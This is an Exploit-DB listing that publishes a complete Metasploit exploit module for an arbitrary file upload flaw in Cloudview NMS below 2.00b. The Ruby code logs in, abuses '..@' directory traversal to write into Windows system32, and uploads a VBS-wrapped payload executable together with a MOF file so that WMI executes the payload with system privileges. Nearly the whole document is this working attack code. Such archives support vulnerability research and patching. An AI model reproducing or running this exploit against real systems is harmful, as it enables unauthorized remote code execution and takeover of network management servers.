Cloudview NMS < 2.00b - Arbitrary File Upload (Metasploit)

2017-09-13T00:00:00
ID EDB-ID:42704
Type exploitdb
Reporter Exploit-DB
Modified 2017-09-13T00:00:00

Description

Cloudview NMS < 2.00b - Arbitrary File Upload (Metasploit). Remote exploit for Windows platform. Tags: Metasploit Framework

                                        
                                            require 'msf/core'

class MetasploitModule &lt; Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::EXE
	include Msf::Exploit::WbemExec

	def initialize(info = {})
		super(update_info(info,
			'Name'           =&gt; 'Cloudview NMS File Upload',
			'Description'    =&gt; %q{
				This module exploits a file upload vulnerability
				found within Cloudview NMS &lt; 2.00b. The vulnerability
				is triggered by sending specialized packets to the
				server with directory traversal sequences (..@ in
				this case) to browse outside of the web root.
			},
			'Author'         =&gt; [ 'james fitts' ],
			'License'        =&gt; MSF_LICENSE,
			'References'     =&gt;
				[
					[ 'URL', '0day' ]
				],
			'DefaultOptions' =&gt;
				{
					'EXITFUNC' =&gt; 'thread',
				},
			'Privileged'     =&gt; true,
			'Payload'        =&gt;
				{
					'BadChars' =&gt; "\x00",
				},
			'Platform'       =&gt; 'win',
			'Targets'        =&gt;
				[
					[ 'Cloudview NMS 2.00b on Windows', {} ],
				],
			'DefaultTarget'  =&gt; 0,
			'DisclosureDate' =&gt; 'Oct 13 2014'))

		register_options([
			Opt::RPORT(80),
			OptString.new('USERNAME', [ true, "The username to log in with", "Admin" ]),
			OptString.new('PASSWORD', [ false, "The password to log in with", "" ])
		], self.class )
	end

	def exploit

		# setup
		vbs_name	= rand_text_alpha(rand(10)+5) + '.vbs'
		exe			= generate_payload_exe
		vbs_content	= Msf::Util::EXE.to_exe_vbs(exe)
		mof_name	= rand_text_alpha(rand(10)+5) + '.vbs'
		mof			= generate_mof(mof_name, vbs_name)
		peer		= "#{datastore['RHOST']}:#{datastore['RPORT']}"

		print_status("Uploading #{vbs_name} to #{peer}...")

		# logging in to get the "session"
		@sess = rand(0..2048)
		res = send_request_cgi({
			'method'	=&gt;	'POST',
			'uri'		=&gt;	"/MPR=#{@sess}:/",
			'version'	=&gt;	'1.1',
			'ctype'		=&gt;	'application/x-www-form-urlencoded',
			'data'		=&gt;	"username=#{datastore['USERNAME']}&password=#{datastore['PASSWORD']}&mybutton=Login%21&donotusejava=html"
		})

		# This is needed to setup the upload directory
		res = send_request_cgi({
			'method'	=&gt; 'GET',
			'uri'		=&gt; "/MPR=#{@sess}:/descriptor!ChangeDir=C:@..@..@..@WINDOWS@system32@!-!-!@extdir%5Cfilelistpage!-!1000",
			'version'	=&gt; '1.1',
		})

		# Uploading VBS file
		data = Rex::MIME::Message.new
		data.add_part("#{vbs_content}", "application/octet-stream", nil, "form-data; name=\"upfile\"; filename=\"#{vbs_name}\"")
		post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")

		res = send_request_cgi({
			'method'	=&gt;	'POST',
			'uri'		=&gt;	"/MPR=#{@sess}:/",
			'version'	=&gt;	'1.1',
			'ctype'		=&gt;	"multipart/form-data; boundary=#{data.bound}",
			'data'		=&gt;	post_data
		})

		if res.body =~ /Uploaded file OK/
			print_good("Uploaded #{vbs_name} successfully!")
			print_status("Uploading #{mof_name} to #{peer}...")

			# Setting up upload directory
			res = send_request_cgi({
				'method'	=&gt;	'GET',
				'uri'		=&gt;	"/MPR=#{@sess}:/descriptor!ChangeDir=C:@..@..@..@WINDOWS@system32@wbem@mof@!-!-!@extdir%5Cfilelistpage!-!1000",
				'version'	=&gt;	'1.1'
			})

			# Uploading MOF file
			data = Rex::MIME::Message.new
			data.add_part("#{mof}", "application/octet-stream", nil, "form-data; name=\"upfile\"; filename=\"#{mof_name}\"")
			post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")

			res = send_request_cgi({
				'method'	=&gt;	'POST',
				'uri'		=&gt;	"/MPR=#{@sess}:/",
				'version'	=&gt;	'1.1',
				'ctype'		=&gt;	"multipart/form-data; boundary=#{data.bound}",
				'data'		=&gt;	post_data
			})

			if res.body =~ /Uploaded file OK/
				print_good("Uploaded #{mof_name} successfully!")
			else
				print_error("Something went wrong...")
			end
		else
			print_error("Something went wrong...")
		end

	end

end